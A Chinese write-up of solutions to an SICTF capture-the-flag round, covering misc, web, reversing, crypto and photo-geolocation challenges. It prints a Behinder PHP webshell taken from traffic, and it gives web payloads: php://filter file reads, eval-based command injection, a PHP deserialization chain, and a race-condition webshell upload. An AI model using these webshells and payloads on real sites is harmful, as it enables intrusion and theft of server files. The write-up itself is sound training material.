比赛打完了,虽然是个公益赛,也是拿到了名次,可是自己还是太菜了,只能做些简单题。。。
MISC
签到]Welcome
Pixel_art
from PIL import Image
# 打开PNG图像文件
image = Image.open('image.png')
# 获取图像的宽度和高度
width, height = image.size
# 遍历每个像素
for y in range(height):
for x in range(width):
# 获取像素的RGB值
r, g, b = image.getpixel((x, y))
# 判断RGB值并输出相应字符
if r == 46:
print('.',end="")
elif r == 33:
print('!',end="")
elif r == 63:
print('?',end="")
if g == 46:
print('.',end="")
elif g == 33:
print('!',end="")
elif g == 63:
print('?',end="")
if b == 46:
print('.',end="")
elif b == 33:
print('!',end="")
elif b == 63:
print('?',end="")
…!!!.?..?.?!.?..!.?..!!!.???.?!.!!!.!!!.?..!!!.?..?.?!.?..!.?..!!!.???.?!.!!!.?..!!!.?..?.?!.?..!.?..!!!.???.?!.!!!..!..!.!!!.?..!!!.?..?.?!.?..!..!.?..!!!.???.?!.!!!..!.!!!.?..!!!.?..?.?!.?..!.!!!.?..!!!.???.?!.!!!..!.?..!!!.???.?!.!!!..!.?..!!!.?..?.?!.?..!..!.!.?..!!!.???.?!.!!!.?..!!!.?..?.?!.?..!.?..!!!.???.?!.!!!.!!!..!.!!!..!.!..!.!!!..!.?..!!!.?..?.?!.?!.!!!.!!!..!.!!!.?..!!!.???.?!.!!!.!.?..!!!.?..?.?!.?..!.?.
Short Ook
baby_zip
bkcrack -C flag.zip -c flag.png -x 0 89504E470D0A1A0A0000000D49484452
bkcrack -C flag.zip -c flag.png -k 6424c164 7c334afd f99666e5 -d flag.png
010查看flag在最后
Easy_Shark
AES冰蝎3流量
<?php
@error_reporting(0);
session_start();
$key="2295d22e2d70888f";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
key = '2295d22e2d70888f'
解冰蝎流量
TGLBOMSJNSRAJAZDEZXGHSJNZWHG
变异凯撒
def decrypt_string(ciphertext, offsets):
decrypted_string = ""
offset_index = 0
for char in ciphertext:
offset = offsets[offset_index] % 26
decrypted_char_code = (ord(char) - ord('A') - offset) % 26 + ord('A')
decrypted_char = chr(decrypted_char_code)
decrypted_string += decrypted_char
offset_index = (offset_index + 1) % len(offsets)
return decrypted_string
ciphertext = "TGLBOMSJNSRAJAZDEZXGHSJNZWHG"
offsets = [1, 50, 61, 8, 9, 20, 63, 41]
while True:
decrypted_string = decrypt_string(ciphertext, offsets)
print(decrypted_string)
FLAG:SICTFSHUMUISAGOODBOYYYYYYYYY
fast_morse
morse解密
得到falg
变成小写
QR_QR_QR
import numpy as np
import matplotlib.pyplot as plt
from pyzbar.pyzbar import decode
from PIL import Image
from pwn import *
# 设置日志级别为调试模式
context(log_level='debug')
# 创建图片函数
def create_image(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
# 生成图片数组
image_array = [[255 if bit == '1' else 0 for bit in line.strip()] for line in lines]
image_array = np.array(image_array, dtype=np.uint8)
# 保存为图片
plt.imsave('output.png', image_array, cmap='gray')
# 读取二维码函数
def read_qr_code(image_path):
image = Image.open(image_path)
decoded_objects = decode(image)
for obj in decoded_objects:
return obj.data.decode('utf-8')
# 连接服务器
conn = remote('210.44.151.51', 10365)
while True:
try:
# 从服务器接收数据
data = conn.recvuntil('Please Decrypt this QR code:', drop=True)
# 将数据保存到文本文件
with open('1.txt', 'w') as file:
file.write(data.decode())
# 从文本文件创建图片
create_image('1.txt')
# 读取图片中的二维码
code = read_qr_code('output.png')
print(code)
# 发送二维码到服务器
conn.sendline(str(code))
conn.recvline()
finally:
# 关闭文件
file.close()
问卷调查
第三道就是flag
SICTF{SICTF_Round3_will_do_even_better!}
WEB
[签到]Include
利用伪协议可直接读到flag
/?SICTF=php://filter/convert.base64-encode/resource=/flag
Baby_PHP
<?php
highlight_file(__FILE__);
error_reporting(0);
$query = $_SERVER['QUERY_STRING'];
if (preg_match('/_|%5f|\.|%2E/i', $query)) {
die('You are Hacker!');
}
if($_GET['k_e_y'] !=='123' && preg_match('/^123$/',$_GET['k_e_y'])){
echo("You are will Win!<br>");
if(isset($_POST['command'])){
$command = $_POST['command'];
if(!preg_match("/\~|\`|\@|\#|\\$|\%|\&|\*|\(|\)|\-|\+|\=|\{|\}|\[|\]|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i",$command)){
eval($command);
}
else{
echo("You are Hacker!");
}
}
}
else{
echo("K_e_y is Errors!");
}K_e_y is Errors!
代码开始会对输入的字符串进行正则匹配,跟_有关的url编码之类的全部过滤
可以用空格或者.代替_,.又被过滤了,用了空格,后面一个简单的若比较换行符绕过
后面cmd一个无数字字母rce
可见ctfshow web40的题解
/?k%20e%20y=123%0a
command=show_source(next(array_reverse(scandir(pos(localeconv())))));
RCE
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","hacker",$code);
$code = str_replace(".","hacker",$code);
eval($code);
?>
借鉴宏爷文章
https://blog.csdn.net/qq_63928796/article/details/127963079
code=echo $_POST[1];&1=cat /f*
我全都要
POP
<?php
highlight_file(__FILE__);
class B{
public $pop = '233333333';
public $i = '1';
public $nogame;
public function __destruct()
{
if(preg_match("/233333333/",$this->pop)){
echo "这是一道签到题,不能让新生一直做不出来遭受打击";
}
}
public function game(){
echo "扣1送地狱火";
if ($this->i = "1"){
echo '<img src=\'R.jpg\'>';
$this->nogame->love();
}
}
public function __clone(){
echo "必须执行";
eval($_POST["cmd"]);
}
}
class A{
public $Aec;
public $girl = 'QNKCDZO' ;
public $boy = '240610708';
public function __toString()
{
echo "I also want to fall in love";
if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
$this->Aec->game();
}
}
}
class P{
public $MyLover;
public $name = '1';
public function __call($name, $arguments)
{
echo "有对象我会在这打CTF???看我克隆一个对象!";
if ($name != "game") {
echo "打游戏去,别想着对象了";
$this->MyLover = clone new B;
}
}
}
$a = new B();
$a ->pop = new A();
$a ->pop ->Aec = new B();
$a ->pop ->Aec -> nogame = new P();
echo serialize($a);
payload
解析时第一个[会解析为下划线
?A[B_C=O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";s:9:"233333333";s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":2:{s:7:"MyLover";N;s:4:"name";s:1:"1";}}s:4:"girl";s:7:"QNKCDZO";s:3:"boy";s:9:"240610708";}s:1:"i";s:1:"1";s:6:"nogame";N;}
cmd=system("cat /flag");
你能跟得上我的speed吗
条件竞争
准备一个php文件
内容为
<?php @eval(system("cat /flag"));?>
抓两个包
一个为get传参的包,访问url/uploads/2.php,抓包
另一个为post包,直接就抓上传的包,如下
俩个包用burp爆破,爆破方式为noplayload,开跑
Re
[签到]PYC
uncompyle6 1.pyc > 1.py
Myobject
动调出数据,直接赛博厨子秒了
chbase
换表加密
不一样的base64
BASE64_CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
def base64_decode(encoded_data):
decoded_data = ''
padding_count = encoded_data.count('=')
encoded_data = encoded_data.replace('=', '')
binary_str = ''
for char in encoded_data:
decimal_val = BASE64_CHARS.index(char)
binary_str += format(decimal_val, '06b')
if padding_count > 0:
binary_str = binary_str[:-padding_count * 2]
for i in range(0, len(binary_str), 8):
byte = binary_str[i:i + 8]
decoded_data += chr(int(byte, 2))
return decoded_data
encoded_data = input('')
decoded_data = base64_decode(encoded_data)
print(decoded_data)
Pwn
[签到]Shop
Crypto
古典大杂烩
🐩👃🐪🐼👅🐯🐩👈👇👭👟👝🐺🐭👉👙👤👋👚🐪🐫👍👢👮👱🐼👢👨👠👭🐽🐰🐻👚👂👧👠👥👛👮👯👮👬🐾👐👛👌👚👞🐨👏👉👆🐿👆👘👇🐺👦🐸👃🐭👟👑👪👃👁🐻🐻👜🐧👇👊🐧🐾🐼👇🐫🐺👐👆👪🐼👋👌👧🐻👐🐩🐺👥🐽👋👉🐰👎👠👠👣🐧🐫👧🐭👢🐯👑👑🐮👂👏🐻👥👚🐮👋👬👌👥👁👣👅👧👯👦👌👌👍👠👌🐽👉👃👊🐫👉🐨🐮👩👆🐪🐯👘👏👏🐼👩👍👊👍👡👀👰👋👣👨👧👍👜👐👛🐮👘👅👠🐿👂👰👄👈👝👠👤👃👛👘🐭👅👱👆👬👫👥👆🐽👁👐👥👊👇👉👊👩👌👭🐫🐫👬👱🐯👇🐺👁👞👑👙🐮👜👋👘👪👩👚👦👨👀👩👐👉👃🐾👥👀🐫👝👍🐩🐧👰👆👇👨🐪👃🐭👦🐫👱
emjio解密
2L3EN82QPvhfC6RbmTc34VkwzEkqivF9DcKpindwxwuGYdUcg1XROHOaPCoAL6hZsLJDDe0PS0GEP4CYOsETUpDY2CnFTR9Wiil04p6k8ZZ7KXDnc7TuUnJlNpxoUUViUFRLS4R17rO38aXXErVSVjIyTlqpVeYd7aNiHKyMQfimLda6NzOutnOFJYnSPRSrUv44uz8PCJgZb7eTasrcoqIrYRLGnI4fV20yOPq3L6o4z
Radio
Easy_CopperSmith
from sage.all import *
import binascii
from Crypto.Util.number import *
n =114007680041157617250208809154392208683967639953423906669116998085115503737001019559692895227927818755160444076128820965038044269092587109196557720941716578025622244634385547194563001079609897387390680250570961313174656874665690193604984942452581886657386063927035039087208310041149977622001887997061312418381
cipher =87627846271126693177889082381507430884663777705438987267317070845965070209704910716182088690758208915234427170455157948022843849997441546596567189456637997191173043345521331111329110083529853409188141263211030032553825858341099759209550785745319223409181813931086979471131074015406202979668575990074985441810
e2 = 0x10001
pbits = 512
for i in range(0,2**4):
p4=0x38481379948fa6f1dcedd12e2fb045f096e9978eccc3be2984a9ede4e6ebe1958606c590
p4=p4+int(hex(i),16)
print(hex(p4))
kbits = pbits - p4.nbits() #未知需要爆破的比特位数
print(p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4) #进行爆破
#print roots
if roots: #爆破成功,求根
p = p4+int(roots[0])
print("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print("q: ", hex(int(q)))
print(gcd(p,q))
phin = (p-1)*(q-1)
print(gcd(e2,phin))
d = inverse_mod(e2,phin)
print("d:",d)
flag = pow(cipher,d,n)
flag = hex(int(flag))[2:]
result = ""
for i in range(0, len(flag), 2):
hex_int = int(flag[i:i+2], 16) # 转换为整数
result += chr(hex_int) # 转换为字符并拼接到结果字符串
print('result :',result)
# SICTF{3f9366ed-b8e4-412f-bbd0-62616a24115c}
MingTianPao
import codecs
import numpy as np
def is_character(x):
return ord('a') <= x <= ord('z') or ord('A') <= x <= ord('Z')
def xor_strings(s1, s2):
return bytes([b1 ^ b2 for b1, b2 in zip(s1, s2)])
def infer_space(index, pos):
if message[index, pos] != 0:
return
message[index, pos] = ord(' ')
for x in range(len(ciphertexts)):
if x != index:
message[x][pos] = xor_strings(ciphertexts[x], ciphertexts[index])[pos] ^ ord(' ')
def find_spaces():
for index, x in enumerate(ciphertexts):
res = [xor_strings(x, y) for y in ciphertexts if x != y]
f = lambda position: len(list(filter(is_character, [s[position] for s in res])))
cnt = [f(pos) for pos in range(len(x))]
for pos in range(len(x)):
space_data.append((f(pos), index, pos))
with open('222.txt', 'r') as file:
ciphertexts = [codecs.decode(x.strip().encode(), 'hex') for x in file.readlines()]
message = np.zeros([len(ciphertexts), len(ciphertexts[0])], dtype=int)
space_data = []
find_spaces()
space_data = sorted(space_data, reverse=True)
for weight, index, pos in space_data:
infer_space(index, pos)
print('\n'.join([''.join([chr(c) for c in x]) for x in message]))
hex_str1 = "1f2037202a1e6d06353b61263d050a0538493b3018544e14171d2b1c4218"
hex_str2 = "Little Red Riding Hood promised"
bytes1 = bytes.fromhex(hex_str1)
bytes2 = bytes(hex_str2, 'utf-8')
result = bytes([a ^ b for a, b in zip(bytes1, bytes2)])
result_str = result.decode('utf-8')
print(result_str)
small_e
低指数加密/m高位攻击
签到题来咯!
import libnum
import binascii
from Crypto.Util.number import *
n = 18993579800590288733556762316465854395650778003397512624355925069287661487515652428099677335464809283955351330659278915073219733930542167360381688856732762552737791137784222098296804826261681852699742456526979985201331982720936091963830799430264680941164508709453794113576607749669278887105809727027129736803614327631979056934906547015919204770702496676692691248702461766117271815398943842909579917102217310779431999448597899109808086655029624478062317317442297276087073653945439820988375066353157221370129064423613949039895822016206336117081475698987326594199181180346821431242733826487765566154350269651592993856883
c1 = 3089900890429368903963127778258893993015616003863275300568951378177309984878857933740319974151823410060583527905656182419531008417050246901514691111335764182779077027419410717272164998075313101695833565450587029584857433998627248705518025411896438130004108810308599666206694770859843696952378804678690327442746359836105117371144846629293505396610982407985241783168161504309420302314102538231774470927864959064261347913286659384383565379900391857812482728653358741387072374314243068833590379370244368317200796927931678203916569721211768082289529948017340699194622234734381555103898784827642197721866114583358940604520
c2 = 6062491672599671503583327431533992487890060173533816222838721749216161789662841049274959778509684968479022417053571624473283543736981267659104310293237792925201009775193492423025040929132360886500863823523629213703533794348606076463773478200331006341206053010168741302440409050344170767489936681627020501853981450212305108039373119567034948781143698613084550376070802084805644270376620484786155554275798939105737707005991882264123315436368611647275530607811665999620394422672764116158492214128572456571553281799359243174598812137554860109807481900330449364878168308833006964726761878461761560543284533578701661413931
def is_prime(n):
if n <= 1:
return False
if n <= 3:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
while i * i <= n:
if n % i == 0 or n % (i + 2) == 0:
return False
i += 6
return True
def franklinReiter(n,e,c1,c2):
PR.<x> = PolynomialRing(Zmod(n))
g1 = (114*x+2333)^int(e) - c1
g2 = (514*x+4555)^int(e) - c2
def gcd(g1, g2):
while g2:
g1, g2 = g2, g1 % g2
return g1.monic()
return -gcd(g1, g2)[0]
for i in range(1024):
if is_prime(i):
e = i
m=franklinReiter(n,e,c1,c2)
print(long_to_bytes((int(m))))
e应该是983
easy_math
demo
#demo
# from secret import flag
# from Crypto.Util.number import *
# m = bytes_to_long(flag)
# c = 57751903193610662622957432730720223801836323458721550133101805763463060486486266309568004721657732742899781400754207249733137375171400440423755473421971160000575072519031824740691618617905549725344323721903857290320737224300672847773455169809689188843070599176261204013341324705808617411345132933937680951713
# e = 65537
# n = p * q
# hint1 = getPrime(13)*p+getPrime(256)*q
# hint2 = getPrime(13)*p+getPrime(256)*q
# c = pow(m,e,n)
# print(f'n = {n}')
# print(f'hint1 = {hint1}')
# print(f'hint2 = {hint2}')
# print(f'c = {c}')
#
# '''
# n = 68123067052840097285002963401518347625939222208495512245264898037784706226045178539672509359795737570458454279990340789711761542570505016930986418403583534761200927746744298082254959321108829717070206277856970403191060311901559017372393931121345743640657503994132925993800497309703877076541759570410784984067
# hint1 = 564294243979930441832363430202216879765636227726919016842676871868826273613344463155168512928428069316237289920953421495330355385445649203238665802121198919543532254290185502622234014832349396422316629991217252686524462096711723580
# hint2 = 484307144682854466149980416084532076579378210225500554261260145338511061452958092407101769145891750844383042274498826787696953308289632616886162073232218214504005935332891893378072083589751354946391146889055039887781077066257013110
# c = 57751903193610662622957432730720223801836323458721550133101805763463060486486266309568004721657732742899781400754207249733137375171400440423755473421971160000575072519031824740691618617905549725344323721903857290320737224300672847773455169809689188843070599176261204013341324705808617411345132933937680951713
# '''
exp
from gmpy2 import gcd,invert
from itertools import product
from tqdm import tqdm
n = 68123067052840097285002963401518347625939222208495512245264898037784706226045178539672509359795737570458454279990340789711761542570505016930986418403583534761200927746744298082254959321108829717070206277856970403191060311901559017372393931121345743640657503994132925993800497309703877076541759570410784984067
hint1 = 564294243979930441832363430202216879765636227726919016842676871868826273613344463155168512928428069316237289920953421495330355385445649203238665802121198919543532254290185502622234014832349396422316629991217252686524462096711723580
hint2 = 484307144682854466149980416084532076579378210225500554261260145338511061452958092407101769145891750844383042274498826787696953308289632616886162073232218214504005935332891893378072083589751354946391146889055039887781077066257013110
c = 57751903193610662622957432730720223801836323458721550133101805763463060486486266309568004721657732742899781400754207249733137375171400440423755473421971160000575072519031824740691618617905549725344323721903857290320737224300672847773455169809689188843070599176261204013341324705808617411345132933937680951713
e = 65537
bar = tqdm(total=(1<<12)**2)
for x1, x2 in tqdm(product(range(1<<12,1<<13), repeat=2)):
q = gcd(hint1*x1 -hint2*x2,n)
bar.update(1)
if q != 1:
print('q=',q)
break
p = n//q
phi_n = (p-1)*(q-1)
d = invert(e, phi_n)
print(bytes.fromhex(hex(pow(c, d, n))[2:]))
Forensics
购物之旅
SICTF{北京市_顺义区_新顺南大街_北京华联顺义金街购物中心}
美女姐姐
SICTF{福建省福州市仓山区烟台山公园}
宝塔镇河妖
SICTF{山东省济宁市汶上县太子灵踪塔}